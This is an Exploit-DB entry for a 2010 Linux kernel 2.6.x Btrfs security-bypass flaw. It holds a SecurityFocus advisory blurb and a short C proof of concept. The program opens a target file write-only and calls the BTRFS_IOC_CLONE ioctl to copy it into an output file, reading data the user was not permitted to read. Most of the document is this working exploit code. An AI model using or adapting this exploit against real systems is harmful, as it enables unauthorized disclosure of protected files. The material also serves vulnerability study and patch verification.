Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass

EDB-ID:

34001




Platform:

Linux

Date:

2010-05-18


/*
source: https://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 
*/

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

  if(argc < 3) {
    printf("Usage: %s [target] [output]\n", argv[0]);
    exit(-1);
  }

  int output = open(argv[2], O_WRONLY | O_CREAT, 0644);

  /* Note - opened for writing, not reading */
  int target = open(argv[1], O_WRONLY);

  ioctl(output, BTRFS_IOC_CLONE, target);

}